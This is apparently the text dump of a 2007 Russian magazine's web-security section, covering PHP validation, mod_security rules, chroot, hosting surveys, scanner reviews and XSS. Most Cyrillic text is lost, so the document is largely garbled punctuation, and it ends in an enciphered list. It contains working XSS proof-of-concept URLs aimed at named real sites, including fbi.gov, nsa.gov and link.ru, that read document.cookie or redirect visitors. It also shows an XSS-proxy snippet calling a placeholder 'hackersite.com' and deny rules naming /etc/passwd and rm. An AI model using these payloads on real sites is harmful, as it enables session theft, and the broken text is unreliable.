$validate->string( $username,
array('format'=>VALIDATE_ALPHA .
VALIDATE_NUM . VALIDATE_SPACE ) )
$validate->email( $email )
$validate->number( $age,
array( 'min'=>0, 'max'=>100 ) )
Validate false, .
: ,
. , , , ,
0 100.

GET

POST

SQL-

HTML

XSS

IP

1.

36 02-07

. ,
, ,
,
- SQL- XSS-.
, PHP

. , . , ( 1).
, magic_quotes, .
$_GET, $_POST,
$_COOKIE. ,
, :


,
.
.
;).

.
, ,
, . ;).
Strong password.
bruteforce, , .
,
.
. 6
:
, .

,
.

(, , 30) 35
-

PHP
function escape_smart($value)
{
if (get_magic_quotes_gpc()) {
$value = stripslashes($value);
}
$value =
mysql_real_escape_string($value);
return $value;
}
BBcode wiki. -

, . - , -

. ,

.
CrackLib.

:
PHP
//
$dictionary = crack_opendict('/usr/
local/lib/pw_dict');
//
$check = crack_check($dictionary,
Q6g$b87gHjn5_4t5sdf!23HLayi');
//
$res = crack_getlastmessage();
echo $res; // 'strong password'
//
crack_closedict($dictionary);
,
.
.
.
10
, ? ,
.
.
-



;).
, ,
.
( ),

, md5.
,
.
. , ,
, . ,
- ,
,
. ,
, .

, ,

.
: ,
,
.
IP. , IP .


.



,
,


, .

, ,
.

$_SERVER[HTTP_REFERER],

,
,
.


TELNET
,
, $_SERVER[HTTP_REFERER]
.
:
,

.

BBcode wiki. , HTML. :


BBcode
[b] ,
[i] [/i][/b],
a .
HTML-. ,
. :
HTML
<strong> ,
<em>
</em></strong>,
a .

XSS-, . ( )
, .
:

37

BBcode
$s = strip_tags($s, "<em><strong>");
,
: ,
BBcode, XSS.
: . , , . -,
, . :
Perl
$st = $db->prepare("SELECT user_name
FROM users WHERE id = ?;");
$st->execute($email);

, .
, id
.
,
, .

string addslashes ( string str )

, ,

. \ + * ? [ ^ ] ( $ )
HTML- , ,
,
htmlspecialchars,
HTML- ()

mysql_query

string quotemeta ( string str )


string htmlspecialchars ( string string )
string htmlentities ( string string )
string mysql_real_escape_string
( string unescaped_string )
.
(MySQL ). ,
,
.
,
,
, . -

, .
outro. .
, ,
,
,
.

38

38

50

58

46

54

62

/ 67

-
100% .
- ,
. ,
?
,

ka Horrific
www.vr-online.ru

,
.
web-? , ,
: , .
? , .
:
;
;
.

( - ) .

:
1

, , . , ,

.
.

,
, . : , ,
, .
,
Linux-. , ,
,
.
, - ,
.
,

39

40 02-07

, ,
, .
Apache
mod_security. , ,
HTTP.
web-
, .
, ,
.
,
, URL-, .
, ?
.
mod_security

- , -, , . .
.
.

SQL Injection . . ,
, .
. 99%
MySQL-
MySQL,
,
.
,
.
.
MS SQL Server
public.
, . , .
web-
. Apache.

SQL Injection, XSS .

.
, .
mod_sequrity. , web- , , -

1 URL /ETC/PASSWD, ,
URL-.
2 URL JAVASCRIPT,
. POST.
<SCRIPT> ,
.
, , . , ,
.
3 URL
, , ,
.

mod_security
URL, ,
.
www.modsecurity.org. httpd.conf :

Jail

S E C F I L T E R E N G I N E ON

;
SECFILTERCHECKURLENCODING ON
;
SECFILTERFORCEBYTERANGE 32 126
.

, 32,
. ,
, .
URL, . , 13, URL %13. 32
126 ,
web-.
SECAUDITLOG LOGS/AUDIT_LOG
,
;
SECFILTERDEFAULTACTION
DENY,LOG,STATUS:406
(
DENY);
SECFILTER XXX REDIRECT:
HTTP://WWW.WEBKREATOR.COM
,
HTTP://WWW.WEBKREATOR.COM;
SECFILTER YYY LOG,
EXEC:/HOME/APACHE/REPORT-ATTACK.PL ,

/HOME/APACHE/REPORT-ATTACK.PL;
SECFILTER /ETC/PASSWORD

41


/ETC/PASSWD (

/ETC/SHADOW);
SECFILTER /BIN/LS


(
LS,
,
),

CAT, RM, CP, FTP ;
SECFILTER \.\./
,
URL
,
;
SECFILTER DELETE[[:SPACE:]]+FROM
DELETE FROM,

SQL-
.

LINUX-

, Linux,

,
chroot. chroot
web-. , web, , . ,
, , , .
chroot .
( Linux chroot), .
, , . chroot, jail.
.
chroot
Linux. /.
/bin, /etc, /home, /usr
.. /home

:
1 SECFILTER INSERT[[:SPACE:]]+INTO
SQL-
.
2 SECFILTER SELECT.+FROM
SQL-
.
3 S E C F I L T E R < ( . | \ N ) + > SECFILTER
<[[:SPACE:]]*SCRIPT
XSS-.

mod_rewrite. , URL-
. ,
.html
, .
html-
! ,
PHP
,
, .
mod_rewrite, -

.
,
chroot.
. /bin,
/usr .. , , /home/chroot,
. ,
/home/chroot
.
,
.
.

/etc, /home/chroot/etc, /etc.


, /home/chroot/etc

. /etc/passwd ,
/home/chroot/etc/passwd.
/home/chroot/etc/passwd, ,
.
, .

bin

usr

var

home

bin

bin

usr

bin

var

bin

home

user1

user2

web- Apache

, .
Mod_rewrite
, , ,
. ,
.
.htaccess.
, :
RewriteEngine on
Options +FollowSymlinks
RewriteBase /abc
RewriteEngine On .
FollowSymlinks,

. , RewriteBase,
URL.
, web-
/documents/article , ,
.htaccess. RewriteBase /erunda,
web- URL
/erunda/filename.php. URL, /documents/article/filename.php.

/documents/article, ,
, /erunda. ,
, .

, . RewriteRule.
:
RewriteRule
, ,
web- URL (, ).
, .
, . , news.php, .

42 02-07

,
: [0-9] , , , . :
news.php?id=$1
, $1
,
( )

mod_rewrite

id. URL 1 :
http://www._.ru/news.php?id=1
,
:
RewriteRule ^news_([0-9]*).htm
news.php?id=$1

URL:
http://www._.ru/news_1.html

, :). , PHP-.
, . , , , , . [0-9]
, , .

, ,
! news.php
, mod_rewrite.
,
:
1
PHP-,
, .
2
.

index.php main.php, enter_to_my_private.php . -

URL, mod_rewrite
http://www._.ru/news.php?id=1 .
, ,
:
REWRITERULE
.
N E W S _ ( [ 0 -9
9]*).HTM
, ,
URL .

. ,
, , (^),
:).
(news_),
.
, , .
, URL-. -

mod_rewrite

news.php, my_99545_news.php. id, sid, index, start, page .. ,


, mod_rewrite , . ,
. , ,

.
, .
? , :
RewriteRule ^news_([a-z0-9]*).htm
news.php?id=$1
, a z. , , , ..
, .
.
,
SQL Injection XSS.
, , .
,
, . , , , .

www.modsecurity.org
mod_security
http://httpd.apache.org/docs/1.3/mod/mod_rewrite.html
mod_rewrite

SAMSUNG NV-7

??
!
! ?
? - ,
? - ,
, ?
! , ,
.

.

!

:

, 1 2007 .
. 9
( ). (, ,
).
: , ,
, , .

: Samsung NV-7 c 7-
7- - Schneider-Kreuznach.
,
.
, , . ,
2-

, 1-
.

44 02-07

WWW.SL.RU

WWW.HOST-PLANET.RU

WWW.KOSMOHOST.COM

WWW.PETERHOST.RU

WWW.HOSTER.RU


PeterHost.Ru

SL.RU: (OpenSource) . ,
(httpload). ,
(rootkit check) ,
. (IDS) Snort.
HOST-P
P LANET.RU: Port
Sentry, Snort, IPPL. ,
c, courtney, Perl. , , .
KOSMOHOST.COM: .
iptables + (Clamav) + .
, ,
, , CMS, ..
. , , ,
( )
, .
, .
, , , , .
PETERHOST.RU: PeterHost.Ru
- .
, .
, , , , , , .
, .
HOSTER.RU: . 7 , .
,
, . DDoS.
SL.RU:
.
( ),
.
/VPS (PHP, FTP, Sendmail).
, .
(, PHP MySQL).
, ,
FireWall ( IP, ).
IP . IDS.
- , /
email .
HOST-P
P LANET.RU: ,
,
. .
, , , , .
, . ,
, , PHP- safe_mode.
KOSMOHOST.COM:
Nobody Check .
PETERHOST.RU: ,
. .
, ,
. ,
. , 8 ,
. c.

45

,
, PHP.
, , ,
,
( ).
HOSTER.RU: .
.

?


(
CHROOT)?

SL.RU: , IDS (),


Firewall (linux iptables, Cisco PIX ..) - (o).
DDoS- , Firewall,
.
HOST-P
P LANET.RU: mod_security ,
, .
KOSMOHOST.COM: iptables, ,
,
IP. mod_security, ,
, IP . , ,
.
PETERHOST.RU:
Apache MySQL - Nginx. ,
, . IP-
, Nginx .
IP DNS-. , , .
, .
.
HOSTER.RU: ,
.
SL.RU: (VPS) Linux Virtuozzo
OpenVZ. FreeBSD jail. chroot. VPS.
HOST-P
P LANET.RU: ftp-jail .
chroot'a , , , .

chroot.
KOSMOHOST.COM: CGI, . PHP web- Apache (PHP
Apache). SuPHP, PHP
CGI, .
PETERHOST.RU: ,
.
HOSTER.RU: chroot.
SL.RU: .
( , , ) backup
. 1, 2 3 1, 2 3
. backup , ,
.
, ( , , ). backup .
HOST-P
P LANET.RU: .
KOSMOHOST.COM: ,
.
PETERHOST.RU: , 2 7 .
HOSTER.RU: .
.

46 02- 07


, - .
, ,
. WEB- , ,
, - . , .
ka Horrific
www.vr-online.ru

? : .
. ,
, , , !
:
, , ,
,
.
, ,

. .
- .
,
, , . , , , , . -

, ,
.

, , !
, . ,

,
.

47

CyD NET Utils


www.cydsoft.com
shareware
300

CyD NET Utils



.
Security Test,



.
web- SQL Injection,
XSS, PHP-
.
, .


, proxy-.
proxy


,
,
,
.

www.apahelpcenter.org. -


File!Security test.


Test web server,


Security test.
,
URL
, ,

(
-).
URL www.apahelpcenter.org
OK. .

, .


SQL Injection. ,
,

.








(
,

).

PHP
ASP.

Macromedia Cold
Fusion. Perl ,
web- .
, , , , .

Acunetix Web
Vulnerability
Scanner
www.acunetix.com
shareware
$349

Acunetix
(
).

Google ads.



testphp.acunetix.com,
testasp.acunetix.com
testaspnet.acunetix.com.
,
,


.

,

.


:
,
.
Vulnerability Scanner
PHP, ASP
ASP.NET.

,

JavaScript-, .

,
HTTP
SOCKS -
.
,
: ,

;
; XSS,
SQL Injection, PHP-,
Google, ,
crlf-injection, ; ,
, (

, ,
).

350 ,


.

48 02- 07

SQL Injection Tools


, SQLHacK

/ . , , ,

.
,

.
?


url, ,
,
SQL Injection
tools:
1 url c ,
www.target.com/index.php?id=123.

url id=123.
2

,
,
, ,
www.target.com/index.php?id=123,
,
www.target.com/index.php?id=123'.
3 ,

.


,

SQL Injection tools.

n4n0bit
http://n4n.cup.su/
freeware
n4n0bit

CGI-. ,
PHP

, .

Perl,
Linux.
SQL/PHP-Injection
( , ), XSS web,
-

Paros
parosproxy.org

,
-,
Java

.

Paros
.
8080 .

.

, 127.0.0.1
8080.

,
Paros

.

. .
, ,
.
,
.
,

.


:
Paros
( ,
,
).

,
,

, ,
.
.

,

.

,
.

.
,
,
, .
100% , .

50 02-07

XSS
XSS
-
.


( ,
)
,

, XSS.
,

XSS .
Dr. Maxim Orlovsky (www.arhont.com)

. XSS- :
1



XSS-;
2

3

XSS-, ;
4
XSS-;
5
XSS-;


.
6

, XSS- , -
.
,
XSS. XSS- ( , )
, .
.
1 XSS DOM. , , JavaScript URL
HTML
Document Object Model (DOM,
). , HTML JavaScript-,

, XSS ,
.


XSS- (
). , .
, JavaScript- ( PHP).
, , .

<HTML>
<TITLE>Welcome!</TITLE>
Hi
<SCRIPT>
var pos=document.URL.indexOf("name=")+5;
document.write(document.URL.substring
(pos,document.URL.length));
</SCRIPT>
<BR>
Welcome to our system
...
</HTML>

http://www.vulnerable.site/welcome.html?
name=<script>alert(document.cookie)
</script>

,
-

< >
URL-encoded %3C %3E.
.
# ( ), URL
, 6 Internet Explorer Mozilla .
http://www.vulnerable.site/welcome.html#name=<script>alert(document.cookie)</script> .
2 XSS. .
(,

non-persistent reflected) .
, XSS-
HTML, CSS JavaScript-
( 1). , CSS
url(javascript:).
3 XSS. ,
, ,
( , ..).
:
( , ), XSS-
/ , !

51

2
2

XSS

XSS

XSS-
. -,
/. AJAX
JavaScript XMLHttpRequest.
XSS-

function HTTPRequest (url)


{
// branch for native XMLHttpRequest
object
if (window.XMLHttpRequest) {
req = new XMLHttpRequest();
req.onreadystatechange =
processReqChange;
req.open("GET", url, true);
req.send(null);
// branch for IE/Windows ActiveX
version
} else if (window.ActiveXObject) {
req = new
ActiveXObject("Microsoft.XMLHTTP");
if (req) {
req.onreadystatechange =
processReqChange;
req.open("GET", url, true);
req.send();
}
}
}
HTTPRequest
("http://vulnerable-blog.com/vulerablescript.php?vulnerable-arg=<iframe
src=http://hacker-site/xss.js>");
,
, -

XSS-
. , ,
XSS,
XSS- ( , ), , , ,
. , ,
, ,
. .
, XSS-, , .
, XSS, . , XSS ,
. ,
. , XSS
.
, .
.
.

/ , <iframe src=http://hacker-site/xss.js>. ,
, MySpace,
-
DDoS'. DDoS
XSS- . , DDoS- (
XSS).
,
XMLHTTPRequest. ,
.

DDoS- ,
DDoS-. , XSS
.
: . -
XSS- , (
DDoS'),
. , XSS- ,
XSS-. ,

,
XSS-, .

XSS DOM

52 02-07


xss?
1
XSS .
- ,
XSS-,
. , XSS .
XSS-, .
, , XSS-.

2

, XSS.
-, - .
HTML-
XSS- . ,

. -, ,
. -, DDOS-,
XSS-. , -,
,
.

XSS
XSS


.
W3C
XSS. ,
XSS , ,
.

- .

,
. , URL
:
text'><script language='javascript'>
, HTML-
GET-, ( )
,
.
HTML-,
, :
<input ... value='here-goes-getparameter-passed-from-us'>
, XSS- ,
HTML, :
<input ... value='text'><script
language='javascript'>
, , HTML-
.
, ,
- .
-
: HTML-
.
XHTML, HTML
( DOCTYPE MIME),
, , :

text'/><script language='javascript'>
.
, , (
, ) : HTTP-

HTTP .
, , ,

.

, :
http://vlunerable.site/script_for_
uploading?file=eto-tipakartinka.js&encoding=utf-8%0AContenttype:%20text/html%0A%0A<html><head>
<script language='javasrript'
src=''></head></html>

URL-encoded.
. , . ,
, , , -, , .
URL- <script. ---, ,
<script,
<object..., <embed...,
<iframe. ?
, !
, HTML .
<head></head>, http-equiv. ? :
<title>Here-goes-parameter-fromURL</title><meta http-equiv='Location'
content='http://our.cool.hacker.site'>
CSS- , :
<style href='style.css'><meta
http-equiv='Location'
content='http://our.cool.hacker.site'>

,
&lt;?
HTML. HTML- onclick, onmouseover .
HTML- ,
JavaScript :
<input ... value='parameter'
onclick='..your-code..'>
?
html events? -

53

&quot;? .
src ,
href javascript:..code... . , , 6
<table background='javascript:'> . URL , .
: javascript ,
HTML-entities (&#x6A; ..),
events (onAbort, onActivate, onAfterPrint, onAfterUpdate, onBeforeActivate, onBeforeCopy ).
XSS.
, , .
.
, ( ). : HTML-, , JavaScript, , (, swf-).
, .
XSS? -,
.
HTML-XSS
,
. , , veryimportantcorpo-


XSS?
,
XSS txt
html-, JavaScript, VBScript, Java .


,
.
XSS ,
( ,

). ,
,

.

XSS-
C XSS-

ration.com , HTML. <iframe...


:). . ,
JavaScript,
DOM , , .

, JavaScript .
XSS .
,
HTML
.
.
.
(sensetive information , ,
)
JavaScript'a, . XMLHttpRequest

1
open
source frameworks ( ,
,
). ,
- XSS-
. ,

,
.
open source, , .
2 ,
. ,

. ,
GET POST-.
,


, ,
.
- , XSS-:

,
. XSS

.
3
, , , , ,
. . ,
(
, open source project),

, !

AJAX ( XSS-AJAX).
- - PHP-, ( ,
) , , . , XSS , XMLHttpRequest ,
.
XSS Proxy:
function HTTPRequest (url)
{
// branch for native XMLHttpRequest
object
if (window.XMLHttpRequest) {
req = new XMLHttpRequest();
req.onreadystatechange =
processReqChange;
req.open("GET", url, true);
req.send(null);
// branch for IE/Windows ActiveX
version
} else if (window.ActiveXObject) {
req = new
ActiveXObject("Microsoft.XMLHTTP");
if (req) {
req.onreadystatechange =
processReqChange;
req.open("GET", url, true);
req.send();
}
}
return (req.responseText);
}
var XSSCode = HTTPRequest
("http://hackersite.com/xss.php?everething-neededis-listed-here");
beyond the invisible. XSS .
. ,
. . XSS CSS , XSS- . , XSS.
-, RSS/Atom, XLink XPath XSS.

54 02- 07



XSS-
90% ,

andrusha@real.xakep.ru


AKA MUSTLIVE
{ID}
- 13
,
-2.
-
2001 .
-
Mustlive security pack
(http://websecurity.com.ua/security-pack/).

Mustlive perl pascal
programs interpreter (http://mlfun.org.ua/ppi/).
websecurity (http://websecurity.com.ua),

-.


-

Q:
?
A: .
, , , , , -. ,
,
,
,
.

( ,
).
- ( ,
, ), - , , . ,
,
.
,
( ).
,
. -


.

. , .
, .
, 10% ()
. , ,
, ,
Q:
,
SQL Injection XSS
-
?
A: .
: .

PHP
( PHP file inclusion).
XSS,
. SQL Injection.
,

55

56 02- 07

( ), Directory indexing, Full path disclosure .



Cross-Site Scripting, Full path
disclosure, PHP-, SQL Injection, Directory indexing .
Q: ,
, SQL Injection
XSS?
?
: , (, ),
. ,

, . , , ,
.

( ) , -, .
.
,
. ,

.


. -
( , -).
Q: ,

SQL Injection
XSS?
: , , ru u .
, .
Acunetix (http://websecurity.com.ua/120/):
SQL Injection 9%, Cross Site
Scripting 27% .
, , ( ).

ru
u XSS-
,
XSS-
90% . SQL Injection
,
10%
. XSS-
(http://websecurity.com.ua/127/), .
Q:
, ,

SQL Injection
XSS. ,
,

,
web.
?
: , . , . .
, ,

-, -
-.
.
- , http://websecurity.com.ua/security/. , , , ,
. ,

. , .
Q:


?
: ,
. - (,
ISS Internet Scanner
http://websecurity.com.ua/378/),
. . , -

(Mozilla )
(GVIM).
, . open source,
. open source,
(http://websecurity.com.ua),
.
, .
, .
(, , XSS),
, ,
,
.
,
( ).
Q:
?
: .
,
,
-
.
,
: ,
- , . ,
,
.
, , . ,

.
, .
,
, ,
. . , ,
.

Q:

?
: , . 60% -

,
59% ,
1% . 40% ,
30%
, 10% . 90% . . .
Q:
? -

,

SQL injection XSS?
:
,
.
, -,
. ,
- ,
.
, .

, .
,
-. , XSpider Positive Technologies ( 7-
). - http://online.xspider.ru.

- -. .
Q: ,
SQL Injection XSS?
?
: . ,
.
, . ,
(
)
.

. , MustLive Security
Pack (http://websecurity.com.ua/securitypack/) .
,
.

57

Q: SQL injection XSS



, Mail.ru?
: .
-,
. .
SQL injection
,
XSS .
:
xss images.yandex.ru
http://websecurity.com.ua/3/;
xss www.yandex.ru
http://websecurity.com.ua/36/;
xss -
,
XSS-
http://websecurity.com.ua/398/.
:
xss adstat.rambler.ru
http://websecurity.com.ua/11/;
xss www.rambler.ru
http://websecurity.com.ua/17/;
xss lenta.ru
http://websecurity.com.ua/23/;
xss horoscopes.rambler.ru
http://websecurity.com.ua/40/;
xss lenta.ru
http://websecurity.com.ua/149/.
Mail.ru:
xss drive.mail.ru
http://websecurity.com.ua/405/
,
:
aport.ru, go.km.ru, cnews.ru, www.rbc.ru,
www.quote.ru, spylog.ru, , 3dnews.ru
( blog.3dnews.ru) .
,
.
Q:

,
.
:
, .
?
: , , ,
.
- , ,
, (

,
). , ,
. ,
HTML, Perl
PHP
.
,
, -, . , .
- ,
,
,
, .

.
. .
SQL
Injection , ( Blind SQL
Injection). SQL DB Structure Extraction
XSS- ( XSS-,
).
Q: , flash
SQL injection
XSS? ?
: -,
, SQL Injection XSS.
- (, PHP ) .

. ( - , ) HTTP- (www.securitylab.ru/analytics/271169.php),
,
XSS- , .
,

, - . - , .
-

,

HTML ( -).
Flash http://websecurity.com.ua/18/, HTTP- http://websecurity.com.ua/373/.
Q:
XSS?
: .
(http://websecurity.com.ua/361/),
(www.securitylab.ru/analytics/271931.php),
XSS Proxy, backweb, BeEF Exploitation
Framework XSS Shell.
( )
,
, ,
.
XSS
,
(
)

(http://websecurity.com.ua/369/).
Q: ,

?
: .
. , , . , (http://websecurity.com.ua/security/), -.
-, - . . .
.


, , .

,
.

http://websecurity.com.ua/120/
-
http://websecurity.com.ua/127/


http://websecurity.com.ua/474/
u 2006
http://websecurity.com.ua/security/

http://websecurity.com.ua/378/
www.iss.net
http://online.xspider.ru
XSpider Online
http://websecurity.com.ua/security-p
pack/
MustLive Security Pack
http://websecurity.com.ua/3/
Cross-Site Scripting
http://websecurity.com.ua/36/

http://websecurity.com.ua/398/
Yandex-Direct
http://websecurity.com.ua/11/
Cross-Site Scripting
http://websecurity.com.ua/17/

http://websecurity.com.ua/23/
XSS lenta.ru
http://websecurity.com.ua/40/
XSS-
http://websecurity.com.ua/149/
lenta.ru
http://websecurity.com.ua/405/
drive.mail.ru
http://www.securitylab.ru/analytics/271169.php
HTTP-
Flash ActionScript
http://websecurity.com.ua/18/
Shockwave Flash
http://websecurity.com.ua/373/
Flash plugin HTTP header injection
http://websecurity.com.ua/361/
XSS
http://www.securitylab.ru/analytics/271931.php


http://websecurity.com.ua/369/

58 02-07



-
.
. - .
aka Mustlive
mustlive@websecurity.com.ua
-.
( , ).
,
,
( , gif jpg),
- ( swf) ( ). , , , .
,
- . - ,
.

-

.
- . , , Cross-Site Scripting .
XSS-
,
, .
,
( , ,
- ). , ,

-
,

XSS-, - .
. , ,

.
XSS-
(, ,
) .
www.clx.ru. XSS- ,
, IP-.
,
XSS. 100%
, .
www.prospero.ru, www.procontext.ru, www.seopoint.ru.

, . , PROCONTEXT
,
PROSPERO, ,

.

, ,
,
. , ,
IP- ( CLX).
XSS-,
(
). search_words
:
http://www.prospero.ru/forum_search?
search=1&search_words=%27%3E%3Cscript%
3Ealert%28document.cookie%29%3C%
2Fscript%3E
http://procontext.ru/forum_search?
search=1&search_words=%27%3E%3Cscript%
3Ealert%28document.cookie%29%3C%
2Fscript%3E
http://seopoint.ru/forum_search?search=
1&search_words=%27%3E%3Cscript%3Ealert%
28document.cookie%29%3C%2Fscript%3E
www.mainlink.ru. :

http://mainlink.ru/find/?what=%3Cscript
%3Ealert(document.cookie)%3C/script%3E
www.setlinks.ru.
http://www.setlinks.ru/partner/editpage.html?id=xxxx
POST- ( ):
"><script>alert(document.cookie)</script>

3Cscript%3Ealert(document.cookie)%
3C/script%3E
http://adbroker.ru/get_code.php?scid=
2484&lid=1&css_class=%22%3E%3Cscript%
3Ealert(document.cookie)%3C/script%3E
www.affiliatenetwork.ru.
:

www.adbroker.ru. :

http://www.affiliatenetwork.ru/
affiliates_new/viewpaid.php?kol_zap_str=
%22%3E%3Cscript%3Ealert(document.
cookie)%3C/script%3E

http://adbroker.ru/user_partner.php
?action=adv_queries&uarq_order=4%22%3E%

www.link.ru. -, , ,

XSS www.fbi.gov
http://www.fbi.gov/cgi-bin/outside.cgi?javascript:alert('XSS')
http://www.fbi.gov/cgi-bin/outside.cgi?javascript:alert(document.cookie)
http://www.fbi.gov/cgi-bin/outside.cgi?http://websecurity.com.ua

(1)

XSS www.nsa.gov
(2)
http://www.nsa.gov/snac/downloads_db.cfm?MenuID=%22%3E%3Cimg%20src=javascript:
alert(%22XSS%22)%3E
alert(XSS), IE
http://www.nsa.gov/snac/downloads_db.cfm?MenuID=%22%3E%3Cimg%20src=javascript:
alert(document.cookie)%3E
alert(document.cookie), IE
http://www.nsa.gov/snac/downloads_db.cfm?MenuID=%22%3E%3Cimg%20src=javascript:
document.location=%22http://websecurity.com.ua%22%3E

60 02-07

. XSS-,
.
:
http://www.link.ru/?sid=%27%3E%3Cscript%
3Ealert(document.cookie)%3C/script%3E
http://www.link.ru/adv.cgi?sid=%27%3E%3C
script%3Ealert(document.cookie)%3C/
script%3E
http://www.link.ru/reklama.cgi?sid=%27%
3E%3Cscript%3Ealert(document.cookie)%3C/
script%3E
http://www.link.ru/siteowner.cgi?sid=%
27%3E%3Cscript%3Ealert(document.
cookie)%3C/script%3E
http://www.link.ru/contact.cgi?sid=
%27%3E%3Cscript%3Ealert(document.
cookie)%3C/script%3E
http://www.link.ru/stats.cgi?sid=%27%3E%
3Cscript%3Ealert(document.cookie)%3C/
script%3E

XSS-

Cross-Site Scripting ( CSS XSS)


(- -)
,

, .
, ,
, .
-
XSS
: XSS,
XSS XSS DOM.
, .
XSS. XSS.
(

). ,
XSS- , -

http://www.link.ru/faq.cgi?sid=%27%3E%3C
script%3Ealert(document.cookie)%3C/
script%3E
http://www.link.ru/?sid=%27%3E%3Cscript%
3Edocument.location%3D'http://
websecurity.com.ua'%3C/script%3E
www.context.meta.ua.
:
http://context.meta.ua/?mode=
phrase&phrase=%3Cscript%
3Ealert(document.cookie)%3C/script%3E
.
(procontext.ru context.meta.ua) XSS-
.
,
, . (XSS ).

. ( )
(
),
( , ).
, ,
,
.

.
- ,
-.
XSS. XSS. ,

XSS.
, XSS-, XSS-
-.
,
,


,
( ). , , ,
.
,
, ,
-

.
XSS DOM (DOM Based XSS).
XSS .

XSS.


.
.
XSS DOM ,
XSS, ( , ),
.
-,
.

www.begun.ru. , -, :
http://www.rambler.ru/srch?words=%D2%E5%
F1%F2%22%3E%3Cscript%3Ealert(document.
cookie)%3C/script%3E
XSS DOM .
http://direct.yandex.ru. XSS-,
( ), ,
- (
itnews.com.ua):
http://itnews.com.ua/s.cgi?page=2'%
3Balert(document.cookie)%3Ba='&q=
%F2%E5%F1%F2
http://itnews.com.ua/s.cgi?page=2'%
3Bdocument.location%3D'http://
websecurity.com.ua'%3Ba='&q=%F2%E5%F1%F2
XSS DOM
. .
. ,
XSS . , , . XSS . , ,
.
http://en.wikipedia.org/wiki/Cross_site_scripting
ross-Site Scripting
www.securitylab.ru/analytics/275087.php
DOM
http://websecurity.com.ua/127/

http://websecurity.com.ua/9/
BugsWeek
http://websecurity.com.ua/90/
mainlink.ru
http://websecurity.com.ua/109/
mainlink.ru
chttp://websecurity.com.ua/137/
adbroker.ru
http://websecurity.com.ua/250/
adbroker.ru
http://websecurity.com.ua/323/
www.link.ru
http://websecurity.com.ua/260/
www.link.ru
http://websecurity.com.ua/17/

http://websecurity.com.ua/398/

http://websecurity.com.ua/397/
itnews.com.ua





http://www.gameland.ru/

Dark Fall: The Journal / Divine Divinity 2 / Elevator Action Old & New / Dorabase / ConXYWZHYNTS)JXYWZHYNTS+NSINSL3JRT'JT\ZQK<FWNT1FSI&I[FSHJ(WNHPJY)FWPXYFQPJWX(MWTSNHQJ9MJ(MFTX9T\JW)F[NI)TZNQQJY/ZIT
'QFHPFSI<MNYJ2FSMZSYJW3J\>TWP0J^XYT2FWFRTS(TTQ/TPJW 8JYQNSJ0SNLMY8MNKY(ZWXJTK8TZQX+:*19FHYNHF4SQNSJ8UFHJTQTS^
)^SFXY^<FWWNTWX&I[FSHJ5XN4UX7F^RFS9MJ,WJFY*XHFUJ+WJJPXY^QJ8(&7
(WF_^1TYT8UWNSL'WJFP2FSMZSYJW8FS+WFSHNXHT5FHNKNH1NGJWFYNTS+TWHJ+WFSPQNSX,WJFY&I[JSYZWJX+WZNYKFQQ8YFWXHFUJ'TRGJWRFS:*+&(MFRUNTSX1JFLZJ)JFIQ^8PNJX...<JMW\TQK5WFJYTWNFSX&SST<FW7TGT'QNY_,ZNQY^,JFW=&I[FSHJ*INYNTS
,ZSXYFW8ZUJW-JWTJX84(42:83F[^8*&1X9WTUNHT5FWFINXJ.XQFSI'TRGJWRFS8YTW^(WFXM'TTR'FSLMFHP.SKJHYNTS5FWY9JJSFLJ
2ZYFSY3NSOF9ZWYQJX2ZYFSY3NLMYRFWJ5WNRFQ8YFW<FWX4GN<FS8ZRRTSJW7JI+FHYNTS..2W8RTT_QJX,TJX3ZYXT
'TG7TXX5FNSYNSL4KK7TFI7JISJHP7FHNSL(FPJ2FSNF'FHP9T9MJ'FPJW^-FWQJR,QTGJYWTYYJWX<TWQI9TZW8UJQQ+TWHJ
8MFIT\<FWX9FQPRFS5T\JWIWTRJ-FWTGTYX&HYNTS(MFXJ-TQQ^\TTI8YZSY)WN[JW7ZG7FGGNYX2)0&WRFLJIITS+WJJ<TWQI,WFSI9MJKY&ZYT
;NHJ(NY^3NLMYXMFIJ)ZSJ,JSJWFYNTSX(TSVZJXY9MJ;^WNZR:UWNXNSL0FWFTPJ7J[TQZYNTS;TQZRJ0FTYMJ0FSLFWTT7TZSI3FSTXYWF^'TWS
&RJWNHF3T5JFHJ'J^TSIYMJ1NSJ<<*7F\8UNIJW2FS3TWYMQFSI,ZS8MT\IT\S/TNSY9FXP+TWHJ2JYJTX'TPYFN9MJ8ZS.XNS>TZW-FSI
)^SFXY^9FHYNHX8YFW<FWX0SNLMYXTKYMJ4QI7JUZGQNH8NSL8YFW8MFIT\LWTZSIX8YFW<FWX/JIN0SNLMY../JIN4ZYHFXY9TR(QFSH^X8UQNSYJW(JQQ)TZGQJ
&LJSY5JYJW/FHPXTSX0NSL0TSL2^YM...9MJ<TQK&LJ,JSJKTWLJ7JGJQQNTS2FWPTK0WN&NW'QFIJ&WHFSZR4K8YJFR\TWPXFSI2FLNHP4GXHZWF
*^J9T^0NSJYNH*^J9T^2TSPJ^2FSNF1JKY'JMNSI*YJWSFQ+TWHJX5TQFWNZR<MT<FSYXYT'JF,F_NQQNTSFNWJ$/FHP
0JFSJ+TWI8YWJJY7FHNSL1&)ZJQ2JYFQ&WRX,QNYHMNSYMJ8^XYJR8NQPWTFI4SQNSJ)J[NQ2F^(W^*XHFUJKWTR&QHFYWF_(WNRJHWFKY-TWXJ7FHNSL2FSFLJW288FLF&3J\)F\S3-19FP9MJ8YFKKTK)WJFRX3J]Y,JSJWFYNTS9JSSNX 7TQFSI,FWWTX:84UJS1JLJSITK?JQIF9MJ
2NSNXM(FU,FSL<FW&WR^TK9\T+ZQQRJYFQ&QHMJRNXYFSIYMJ'WTPJS&SLJQ(FXYQJ[FSNF5TWYWFNYTK7ZNS),WF^2FS3N4M'WZHJ1JJ6ZJXYTKYMJ
)WFLTS9MWJJ0NSLITRX(QFXMTK)JXYNS^<FWMF\P2TYT,5:QYNRFYJ7FHNSL9JHMSTQTL^>X9MJ&WPTK3FUNXMYNR&QNJS'QFXY9MJ*SHTZSYJW
,ZSXQNSLJW,NWQ;TQ.S(TQI'QTTI5WNSHJXX3FYFXMF8YZIJSY8JHWJY&LJSY,WFSI9MJKY&ZYT1JLFH^)FWP8MFIT\X
2JYWTNI5WNRJ*HMTJX(TSXYFSYNSJ&LJTK2^YMTQTL^9MJ9NYFSX0NSLTK7TZYJ(FY\TRFS9^HTTS(NY^3J\>TWP8NI2JNJWX7FNQWTFIX7F^RFS
-TTIQZR-F[TH8ZRRTSJWYTQNKJ<*114SQNSJ,FQFHYNH<WJXYQNSL+JFYZWNSL:QYNRFYJ2ZXHQJ2JIFQTK-TSTW7NXNSL8ZS(TIJ&LJ(TRRFSIJWX
